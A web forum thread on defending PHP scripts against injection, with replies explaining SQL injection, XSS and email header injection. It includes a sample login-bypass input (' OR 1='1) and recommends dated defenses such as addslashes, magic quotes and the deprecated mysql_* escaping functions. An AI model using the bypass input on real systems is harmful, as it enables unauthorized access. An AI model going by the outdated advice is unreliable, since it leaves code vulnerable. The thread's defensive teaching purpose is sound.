Hello, i read in article that someone can do an injection to php script, it says that it can be done by inserting a script via URL (GET method) & a field from a form (POST method). My question is: 1. What should i do to avoid php injection via GET & POST fields? 2. What shouldn't i do, in any script that it can make a hole to an injection? 3. Is htmlspecialchars important tp avoid php injection? Thanks
http://www.acunetix.com/websitesecurity/sql-injection.htm http://unixwiz.net/techtips/sql-injection.html http://www.google.com/search?q=php+sql+injection
i think a simpler way to get rid from sql injections is to use mysql_escape_string() in your sql queries..
Or, preferably, mysql_real_escape_string(). mysql_escape_string() is deprecated, and should no longer be used.
It basically comes down to this: Do NOT trust user-provided data. There are three big concerns: SQL injection, XSS, and "email injection" (not sure if there's a specific term). SQL injection is when someone is able to run SQL commands on your database because you did not filter his/her input. XSS is when someone is able to alter the display of your page because you did not filter HTML/CSS/JavaScript from the input. Email injection is when someone is able to alter the usage of your email script in order to send out spam. Each of these is stopped in a different way, but the main theme is the same: filter user input. SQL Example query: SELECT * FROM users WHERE name='$name' AND password='$password'; If your PHP script just dumps user input, someone could put admin for name and ' OR 1='1 for password. This makes the query: SELECT * FROM users WHERE name='admin' AND password='' OR 1='1'; One is always equal to one, so it only has to match the username. XSS Never echo/print post or get variables directly. One of the big ways this is used is to transfer cookie data using JavaScript, but it can also be used to alter your HTML so that a form is submitted elsewhere (e.g., a login form). Email The top of an email might look something like this: From: "User" <whattheyput@example.com> To: <intended > If you don't filter their input, they could put a newline/carriage return at the end of the From line and then add their own "To: blah" line. Hopefully these overly simple examples explain the basic concepts. 1. Always filter user input. 2. Never trust user input. 3. That can be used against XSS, but is not always the desired method.
In general, all information that has been supplied by the user that I print out to the browser I use htmlspecialchars against it. If they have tried to insert script tags or what not, you will simply read the script tags they have entered and they will not function to perform the script they are trying to execute. This will protect against XSS attacks. If you want to get incredibly secure, you can use regular expressions to strip certain characters from their input, but I can't help with that. As far as protecting SQL injection, it is a little tougher. First, you need to know whether magic quotes is enabled or not. You can use get_magic_quotes_gpc() function for that. If it is, magic quotes will add slashes to data. If it isn't you will want to use addslashes before it enters the database. Magic quotes I believe will also effect $_GET values. So you will want to strip or add slashes as needed. I also suggest using mysql_real_escape_string on data as mentioned above. Now, as far as using $_GET (ex, getting values that are passed in URL and using in queries), you will want to really take care of those. Never trust data sent by a user or data that can even be altered by a user, this goes for ALL form values, even hidden ones. A good rule of thumb is to escape all user supplied output with htmlspecialchars and protect all data sent to database with mysql_real_escape_string. Search php.net manual for most of these terms above and you will get a better understanding of them.
The easiest way to avoid PHP injection is implementing this small snippet into your index page, http://codr.us/category/PHP/Avoid-URL-injection
Great way to avoid XSS is if you do echo/print variables, attach htmlspecialchars(). If there was code injected such as <script>, it will print just like that and not initiate as code. Very handy.
use the following mysql_real_escape_string() during the query mysql_real_escape_string($email), mysql_real_escape_string($comment));